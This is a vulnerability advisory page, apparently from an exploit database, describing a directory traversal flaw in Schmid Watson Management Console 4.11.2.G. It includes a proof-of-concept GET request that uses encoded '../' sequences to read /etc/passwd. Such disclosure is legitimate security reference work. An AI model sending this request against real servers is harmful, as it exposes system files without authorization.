header-logo
Suggest Exploit
vendor:
Management Console
by:
SecurityFocus
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: Management Console
Affected Version From: 4.11.2.G
Affected Version To: 4.11.2.G
Patch Exists: N/A
Related CWE: N/A
CPE: a:schmid_watson:management_console
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

Schmid Watson Management Console Directory Traversal Vulnerability

Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.

Mitigation:

Input should be validated and filtered to prevent directory traversal attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/57237/info

Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.

Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected. 

GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1

Navigation

Suggest Exploit

Services By CQR